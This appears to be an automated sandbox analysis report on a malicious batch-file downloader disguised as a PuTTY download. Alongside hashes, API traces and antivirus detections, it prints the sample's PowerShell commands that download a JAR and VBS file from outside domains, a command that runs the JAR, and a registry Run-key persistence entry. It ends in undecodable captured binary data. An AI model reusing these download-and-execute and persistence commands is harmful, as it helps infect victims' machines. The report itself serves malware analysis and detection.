Summary | ZeroBOX

POA35BT56TT.bat

Generic Malware Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P DGA Http API FTP Socket Escalate priviledges DNS Code injection PWS Sniff Audio Steal credential AntiDebug ZIP Format AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us Dec. 14, 2023, 10:12 a.m. Dec. 14, 2023, 10:14 a.m.
Size 1.7KB
Type DOS batch file, ASCII text, with CRLF line terminators
MD5 5409f23480db5358d2cc2417f2c41494
SHA256 48d6f5e343c4fbe7726f8bad43cfb817d419281c1cc932b4d04bbbe805c5c8f8
CRC32 46DBE089
ssdeep 24:w8oIhtxnsFDIztRPP0vb+bY3fuvl/vORKQNb/jx5bRqjTuTYJw+x8hEHNySsRDHc:FRxsotybz8ex+/G+FNnsR7OSeX8ElX
Yara None matched

IP Address Status Action
154.127.53.176 Active Moloch
164.124.101.2 Active Moloch
167.250.5.28 Active Moloch
67.20.115.231 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Document is being downloaded. Please wait until the process is completed.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Downloads completed. Files saved to C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar and C:\Users\test22\AppData\Local\Temp\PuttyDownload\run_hidden.vbs
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005f03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006707e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006707e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006707e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670a68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670a68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670a68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670a68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670a68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670a68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006707e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006707e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006707e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006709a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670ba8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00670ba8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046f820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046fde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046fde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046fde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046f560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046f560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046f560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046f560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046f560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046f560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: 8b 06 8d b5 f8 00 00 00 c5 fe 7f 06 c5 fe 7f 7e
exception.instruction: mov eax, dword ptr [esi]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x2680202
registers.esp: 12449016
registers.edi: 1
registers.eax: 6
registers.ebp: 1950012608
registers.edx: 0
registers.ebx: 16910336
registers.esi: 0
registers.ecx: 3405691582
1 0 0
suspicious_features GET method with no useragent header suspicious_request GET http://eusketxe.com/s/putty.jar
suspicious_features GET method with no useragent header suspicious_request GET http://brahmacouncil.com/fs/fs/run_hidden.vbs
request GET http://eusketxe.com/s/putty.jar
request GET http://brahmacouncil.com/fs/fs/run_hidden.vbs
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02450000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02517000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02502000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02515000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02800000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02503000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02504000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02505000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02506000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02507000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02508000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02509000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04920000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04921000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04922000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04923000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04924000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04925000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04926000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04927000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04928000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04929000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0492a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0492b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0492c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0492d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0492e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0492f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04930000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04931000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04932000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04933000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04934000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\PuttyDownload\run_hidden.vbs
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\cmd.exe" /c java -jar "C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar"
cmdline powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://eusketxe.com/s/putty.jar', 'C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar')"
cmdline cmd.exe /c "REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Home /d "C:\Program Files (x86)\Java\jre1.8.0_131\bin\javaw.exe -jar C:\Users\test22\AppData\Roaming\Microsoft\.tmp\1702534343114.tmp" /f"
cmdline powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://brahmacouncil.com/fs/fs/run_hidden.vbs', 'C:\Users\test22\AppData\Local\Temp\PuttyDownload\run_hidden.vbs')"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c java -jar "C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar"
filepath: cmd
1 1 0
Kaspersky HEUR:Trojan.BAT.Agent.gen
ZoneAlarm HEUR:Trojan.BAT.Agent.gen
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2564
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 65536
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x16200000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received wx’5DÙ ýD°Úã'ƒž Ù10BåÐ=0oº‰0X³J7-Ø’fR¥4ºËÝ@ª5\„4ÝÜ£8k½¾†áÓåò(¹³\//a¸X££¬¥œu­‘‰5VÉ¥ry…¼ÊYc¦"–g@¬=D¥ù0Œv¨?FS?ÇE}UWìÍôu?ݶ—þ¶Sºû!ºk„¼Æ9ão¼=þrµ²¿!Ï!B¾&Â&ê"LrŽþ0Y3VĽ?4±œ»E"LuP-ШNs¡Z¨Snï×¢Vý:C·;=Ý&B1óð1VA„}‚v‹–ÉMºÜ¢¿<Dž³6VZD˜©ÉgѺX”ÄõF@™£”v1®xéoÏ%ʵr¼›Åh ´ú‹Páô"ú»qýwã"TêµéïÌeªt9'˓eY–d¬1[ïñ)ˆ ò”R BµÞÛ5£ÔjF™ãb”¹ºQæ]Poï¡}ýÄÑ£é\ï·1HÛ_„ùξ®³÷õûB÷zû.ÜéÜ;¹ë»›íûÚPÊÿú`ó|êcCû§kN",qò¿ÒΩîkUÎßd»zÊ2‡XË5±V¸ˆµRk•ÝS®jáq"¬Ö:DØÑZNm˔øE-è1›~ñ>ؕíÕ¬¡g5Ž±1ˆŽSå©ll¼Vùêä©rù äٟÞLk„ëµg äiòZT(²ÍÕép£öh¡<]^HÉEtÀœ!É3dävókå ”áæVʬm…ßâ0Í:Í4·º˜æ6Ý4ëí¦¹½UÝ¡÷û]Ö±ÑòØûHŒwKö¶UÆel´¶U¶Â†{¬Ér2¶c… Ú \VØ ¯°Á¾Â Lm…myÇ:.ZÇx=èàÕ_¶ë¼ú‹ðãõ¨u€<y=æàµSãµË…×ã:¯»–»[iÙ¨kù„u|´<žqÞëà<PˆœŸÔ9á)Æù u<9?íàüŒÆùYÎÏéœéZòØy‡uf/Xs£å\Æ숃Ùpy82{Qg6\„£ŒÙ1«M¶!³WÌ^Ә½îÂì Ù›:3î.ôÅ/·æEËyŒÙ;fƒåÁÈì„Îl°ï2fï[SädöƒÙ‡³&f§ufٙ…ˆð±ÎìSk~´œÏ˜}æ`6D‚Ì>י á ÆìkªœŠÌ¾u0ûNcö½ ³tfgìøc«üIçü‹uB´<qþÕÁ9]NGοéœÓEøqþÛ:L†œ›íœ „q6pNÎ^ãl³ÁВ³ÁÍÁ&MN‹ î:›4Ñ@×  /ëPyèÑ`–Z, Þ-ãÔàÓ ÷mU_hñœ¸›¦˜Vz}D,¦ëLûLûˆŸ[7··âÇßÎá?Ç<Ž?/³W¯þöW-f“‚fMÖØß·'µÚ1ù÷þ´½šÌ6¢ùê_@” 